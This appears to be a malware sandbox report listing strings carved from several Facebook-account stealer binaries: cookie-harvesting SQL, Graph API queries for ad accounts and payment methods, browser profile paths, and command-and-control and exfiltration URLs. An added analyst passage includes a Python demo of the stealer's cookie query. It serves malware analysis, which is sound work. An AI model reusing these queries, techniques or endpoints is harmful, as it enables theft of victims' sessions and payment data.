riginal_balance%%2Ctime_created%%2Ctime_expire%%2Ctype%%7D%%7D%%22%%5D&include_headers=false&locale=en_US&method=get&pretty=0&suppress_http_code=1&xref=f33f78145820f4 }"pay":instagramds_user_id\\"\\"", "path":"/", "secure": false,"value": "{"domain":"www.instagram.com", 
"expirationDate":1590337688, "hostOnly": false, "httpOnly": true, "name": "instagram cookie:%s equals www.facebook.com (Facebook)
Source: 002.exe | String found in binary or memory: Cookie: c_user={https://www.facebook.com/ads/manager/accounts/https://www.facebook.com/settings?tab=notificationsnoyes","isValid":"0https://www.facebook.com/profile.php"displayable_count":{"FantailLogQueue":null},"friends":"mail":"https://www.facebook.com/accountquality/%s/?source=mega_menu&nav_source=flyout_menu&nav_id=1765193856"adAccountID":""ad":"https://www.facebook.com/bookmarks/pages?ref_type=logout_gearid:"\d+",name:"(.+?)",count: equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmp | String found in binary or memory: Referer: https://www.facebook.com equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: T.exe_,"Friends":","status":","currency":","bm":","type":","a":","b":"p,"Channel":","Browser":"rltext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*;q=0.8,application/signed-exchange;v=b3username":"},edge_followed_by":{"count":edge_follow":{"count":email":"phone_number":"gender":first_name":","last_name":"{#}\"co":""br":""sy":""yo":""pa":""re":""ph":""se":""fs":"fsr":inauth_tokentwhttps://www.airbnb.cn/account-settingstext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3.airbnb.cnacha"compat_iframe_token":"https://www.facebook.com/settings?cquick=jsc_c_c&cquick_token=&ctarget=https%3A%2F%2Fwww.facebook.comhttps://www.facebook.com/settings&#064;</strong><strong>@b88801?act=</span><span>https://www.facebook.com/ads/manager/account_settings/account_billing/?act=&pid=p1&page=account_settings&tab=account_billing_settingsaccess_token:"adsApiVersion:"sessionID:"locale:"https://graph.facebook.com//act_?access_token=&_reqName=adaccount&_reqSrc=AdsPaymentMethodsDataLoader&_sessionID=&fields=%5B%22all_payment_methods%7Bpayment_method_altpays%7Baccount_id%2Ccountry%2Ccredential_id%2Cdisplay_name%2Cimage_url%2Cinstrument_type%2Cnetwork_id%2Cpayment_provider%2Ctitle%7D%2Cpm_credit_card%7Baccount_id%2Ccredential_id%2Ccredit_card_address%2Ccredit_card_type%2Cdisplay_string%2Cexp_month%2Cexp_year%2Cfirst_name%2Cis_verified%2Clast_name%2Cmiddle_name%2Ctime_created%2Cneed_3ds_authorization%2Callow_manual_3ds_authorization%2Csupports_recurring_in_india%7D%2Cpayment_method_direct_debits%7Baccount_id%2Caddress%2Ccan_verify%2Ccredential_id%2Cdisplay_string%2Cfirst_name%2Cis_awaiting%2Cis_pending%2Clast_name%2Cmiddle_name%2Cstatus%2Ctime_created%7D%2Cpayment_method_extended_credits%7Baccount_id%2Cbalance%2Ccredential_id%2Cmax_balance%2Ctype%2Cpartitioned_from%2Csequential_liability_amount%7D%2Cpayment_method_paypal%7Baccount_id%2Ccredential_id%2
Cemail_address%2Ctime_created%7D%2Cpayment_method_stored_balances%7Baccount_id%2Cbalance%2Ccredential_id%2Ctotal_fundings%7D%2Cpayment_method_tokens%7Baccount_id%2Ccredential_id%2Ccurrent_balance%2Coriginal_balance%2Ctime_created%2Ctime_expire%2Ctype%7D%7D%22%5D&include_headers=false&locale=&method=get&pretty=0&suppress_http_code=1pm_credit_card"country":mastervisaamericanpaypalbalance</td>||-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36ike.airbnb.cn11fiachitichiffiedtch9C71F883-5E43-41AA-85D0-5272784FB258,"Creditcard":"timeline_chrome.php?sk=friendshttp://103.91.21Facebook</title>facebook</title>book.com/pages/?category=your_paall_accounts_tabhttp://qazwsxedcnavigate_from_adSoftware\\TestRele_account_id_cehttps://www.facebook.com/profilebook.com/settinggister\\TestRegiges&ref=bookmarkbook.com/ads/managram.com/accouncompat_iframe_toks/pages?ref_typbook.com/bookmarhttps://www.instadmined_pages":{ equals www.facebook.com (Facebook)
Source: ubisoftpro.exe | String found in binary or memory: \MicrosoftEdgeCP\\Application\\c\\Google\\Chrome\\User Data\\Def\\Mozilla\\Firefwww.facebook.comwww.instagram.co\\Mozilla Firefo equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481728424.000000000075E000.00000004.00000001.sdmp | String found in binary or memory: ct name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0 equals www.facebook.com (Facebook)
Source: hjjgaa.exeString found in binary or memory: d@invalid stoi argumentstoi argument out of rangeUseJu47egg whatppphatOjk4ehg riwjgHgegUse whatppphatYk43h7gr riwjg^(([^:\/?#]+):)?(//([^\/?#:]*)(:([^\/?#]*))?)?([^?#]*)(\?([^#]*))?(#(.*))?MalformedHh6e4sgg urlStrXhegkh4gErrorJhg4eu (WinHttpOpenNm4eg)ErrorOj7g4he (WinHttpGetProxyForUrlTh7e4gh)Error (WinHttpGetProxyForUrl)httphttpsUnknownNsV6e4hg schemeBe7n4us ErrorBjhe4hg (WinHttpConnectLj6e3hgg)?ErrorS7je4hg (WinHttpOpenRequestP6je4hg)ErrorHf74ge7g (WinHttpSendRequestVe7j4gi)ErrorJh7b4egg (WinHttpSendRequestPke4jhg)ErrorKj7e4hg (WinHttpReceiveResponseCeheg34g)ErrorTjr57eh (WinHttpQueryDataAvailableAe7hj4g)ErrorUj7e4hg (WinHttpReadDataPjke4hg)ErrorGh7e4hg (WinHttpSetCredentialsHe7j4hg)ErrorPj7e4hg (WinHttpQueryHeadersYg8e5gg)ErrorJh7eg4g (WinHttpQueryAuthSchemesYe6hg4)POSTGETlogin/device-based/loginContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9viewport-width: 1920Sec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Referer: https://www.facebook.com/Origin: https://www.facebook.comSec-Fetch-Dest: documentUpgrade-Insecure-Requests: 1/adsmanager/creation?act=/ads/manager/account_settings/account_billingSec-Fetch-Site: noneAccept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1v7.0/act_Accept: */*Content-type: application/x-www-form-urlencodedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-sitemanager/account_settings/account_billingprimary_location/infoprofile.phppages/?category=your_pageshttps://www.facebook.com/Error (WinHttpSetOption)Error (WinHttpAddRequestHeaders)vector<T> too longvector<bool> too longalnumalnumalphaalphablankblankcntrlcntrldddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacessupperupperwwxdigitxdigitXlG equals www.facebook.com (Facebook)
Source: ubisoftpro.exe | String found in binary or memory: http://103.91.21Facebook</title>facebook</title>book.com/pages/?category=your_paall_accounts_tabhttp://qazwsxedcnavigate_from_adSoftware\\TestRele_account_id_cehttps://www.facebook.com/profilebook.com/settinggister\\TestRegiges&ref=bookmarkbook.com/ads/managram.com/accouncompat_iframe_toks/pages?ref_typbook.com/bookmarhttps://www.instadmined_pages":{ equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmp | String found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Source: 002.exe | String found in binary or memory: https://www.facebook.com/accountquality/%s/?source=mega_menu&nav_source=flyout_menu&nav_id=1765193856 equals www.facebook.com (Facebook)
Source: 002.exe | String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/information/?act=%s&pid=p1&page=account_settings&tab=account_information equals www.facebook.com (Facebook)
Source: 002.exe | String found in binary or memory: https://www.facebook.com/ads/manager/accounts/ equals www.facebook.com (Facebook)
Source: hjjgaa.exe | String found in binary or memory: https://www.facebook.com/adsmanager/manage/campaigns?act=fb_id equals www.facebook.com (Facebook)
Source: 002.exe | String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 002.exe | String found in binary or memory: https://www.facebook.com/pages/?category=your_pages&ref=bookmarks equals www.facebook.com (Facebook)
Source: 002.exe | String found in binary or memory: https://www.facebook.com/profile.php equals www.facebook.com (Facebook)
Source: hjjgaa.exe | String found in binary or memory: https://www.facebook.com/profile.php?id=c_user&sk=friends equals www.facebook.com (Facebook)
Source: ubisoftpro.exe | String found in binary or memory: https://www.facebook.com/settings equals www.facebook.com (Facebook)
Source: 002.exe | String found in binary or memory: https://www.facebook.com/settings?tab=notifications equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmp | String found in binary or memory: k@Ohttps://www.facebook.comhttp://101.36.107.74/seemorebty/z9Yzbx5JbVSUWmThFFDroiderFDroid1Software\ffdroiderhttps://www.facebook.comwww.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36/ads/manager/accountsall_accounts_table_account_id_cellhref="/pages/?category=your_pages&amp;ref=bookmarks?act= equals www.facebook.com (Facebook)
Source: ubisoftpro.exe | String found in binary or memory: kK`C:\%x\mshtml.dllIsWow64Processkernel326432%d.%d.%d.%d\MicrosoftEdgeCP\\Application\\c\\Google\\Chrome\\User Data\\Def\\Mozilla\\Firefwww.facebook.comwww.instagram.co\\Mozilla Firefo equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmp | String found in binary or memory: p]rhttps://www.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36en-US,en;q=0.9Keep-Alivei equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.480028435.0000000000718000.00000004.00000001.sdmp | String found in binary or memory: qhttps://www.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537 equals www.facebook.com (Facebook)
Source: hjjgaa.exeString found in binary or memory: size: length: capacity: max_size: https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:_/v7.0/acthttps://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_middle_of_local_entity_migration%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1un_pwdfb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewable_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1"business"dataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v7.0/act_fb_uid?access_
token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spenthttps://www.facebook.com/adsmanager/manage/campaigns?act=fb_idfb_id,:{account_currency_ratio_to_usd,adtrust_dslcategory=your_pagestimeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6""items":{"count"api/fbtime{"sid":0,"time":0,"rand_str":""}api/?sid=sidtimerand_str&key=statusTxG]B equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481728424.000000000075E000.00000004.00000001.sdmpString found in binary or memory: uct name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0 equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481728424.000000000075E000.00000004.00000001.sdmpString found in binary or memory: www.facebook.com" equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481303695.0000000000726000.00000004.00000001.sdmpString found in binary or memory: www.facebook.comg equals www.facebook.com (Facebook)
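The SELECT carved from jg2_2qua.exe memory (`... from cookies where instr("www.facebook.com", host_key)>0`) is the stealer reading Chrome's Cookies SQLite database. Its filter is a reverse substring test: SQLite's instr(X, Y) looks for Y inside X, so any host_key that is a substring of "www.facebook.com" matches. The following added example (written for this page, not code from the sample or from Joe Sandbox) builds a constructed in-memory stand-in for the cookies table with the four columns the query touches and runs the same WHERE clause to show exactly which rows it pulls, including the over-match on a host_key such as ".com". The double-quoted string literal in the carved query is only accepted by SQLite builds that keep the legacy SQLITE_DQS setting, so the example uses the standard single-quoted form; the host_key values and cookie names are assumptions chosen to exercise the filter.

```python
import sqlite3

# WHERE clause from the carved string, with the string literal single-quoted
# (the original's double quotes rely on SQLite's legacy SQLITE_DQS behaviour).
STEALER_WHERE = "instr('www.facebook.com', host_key) > 0"
STEALER_QUERY = f"select name, value, encrypted_value from cookies where {STEALER_WHERE}"


def build_cookie_db():
    """Constructed stand-in for Chrome's Cookies file: same column names the
    query references, populated with assumed rows. In Chrome 80+ `value` is
    empty and `encrypted_value` holds AES-256-GCM ciphertext (v10 prefix)
    keyed by the DPAPI-wrapped key in the profile's Local State file."""
    db = sqlite3.connect(":memory:")
    db.execute("create table cookies (host_key text, name text, value text, encrypted_value blob)")
    rows = [
        (".facebook.com", "c_user", "", b"v10\x00\x01"),              # matched
        ("facebook.com", "xs", "", b"v10\x00\x02"),                   # matched
        ("www.facebook.com", "datr", "", b"v10\x00\x03"),             # matched
        (".com", "unrelated", "", b"v10\x00\x04"),                    # over-match: ".com" is a substring
        (".instagram.com", "sessionid", "", b"v10\x00\x05"),          # not matched
        ("www.facebook.com.evil.example", "x", "", b"v10\x00\x06"),   # not a substring: not matched
    ]
    db.executemany("insert into cookies values (?, ?, ?, ?)", rows)
    return db


def run_stealer_query(db):
    """Rows exactly as the stealer's SELECT would receive them (no host_key)."""
    return db.execute(STEALER_QUERY).fetchall()


def matched_hosts(db):
    """Which host_key values the stealer's WHERE clause selects, for review."""
    rows = db.execute(f"select host_key from cookies where {STEALER_WHERE}").fetchall()
    return sorted(h for (h,) in rows)


if __name__ == "__main__":
    db = build_cookie_db()
    for host in matched_hosts(db):
        print("selected:", host)
```

The point for an analyst: the filter grabs every Facebook cookie regardless of subdomain, and anything else whose host_key happens to be a substring of the literal. Reading `encrypted_value` additionally requires the DPAPI-unwrapped key from Local State, which is why this family runs inside the victim's session rather than copying the file off-host.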
Source: unknown DNS traffic detected: queries for: g.msn.com
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmp String found in binary or memory: http://101.36.107.74/seemorebty/
Source: jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://101.36.10https://www.instH
Source: ubisoftpro.exe String found in binary or memory: http://103.91.21Facebook
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmp String found in binary or memory: http://7553014BD6A4211B.xyz/
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmp String found in binary or memory: http://7553014BD6A4211B.xyz/L
Source: aliens.exe, 00000013.00000002.508492865.0000000000B96000.00000004.00000020.sdmp String found in binary or memory: http://7553014BD6A4211B.xyz/info/w
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmp String found in binary or memory: http://7553014BD6A4211B.xyz/ng
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmp String found in binary or memory: http://7553014bd6a4211b.xyz/0
Source: aliens.exe, 00000013.00000002.508492865.0000000000B96000.00000004.00000020.sdmp, aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmp String found in binary or memory: http://7553014bd6a4211b.xyz/info/w
Source: hjjgaa.exe String found in binary or memory: http://Ojyehq4jg.2ihsfa.com/
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmp, aliens.exe, 00000013.00000002.508666439.0000000000BCF000.00000004.00000020.sdmp String found in binary or memory: http://charlesproxy.com/ssl
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: jg2_2qua.exe, 0000001A.00000003.481303695.0000000000726000.00000004.00000001.sdmp String found in binary or memory: http://crl.como
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmp String found in binary or memory: http://crl.comoU
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp String found in binary or memory: http://crl.comoZ
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: aliens.exe, 00000013.00000002.508666439.0000000000BCF000.00000004.00000020.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: hjjgaa.exe String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: aliens.exe, 00000013.00000002.508559285.0000000000BAC000.00000004.00000020.sdmp, jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: hjjgaa.exe String found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 85F91A36E275562F.exe.19.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: jg2_2qua.exe, 0000001A.00000003.495377246.0000000003FC0000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: jg2_2qua.exe, 0000001A.00000003.489035024.0000000003DA7000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: hjjgaa.exe String found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSec
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSec)
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 002.exe String found in binary or memory: http://ffdownload.online/business/receive
Source: 002.exe String found in binary or memory: http://ffdownload.online/business/receiveConnection:
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTly?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuY5J?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuqZ9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvrrg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXiwM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18qTPD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xJbM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yHSm?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yqHP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
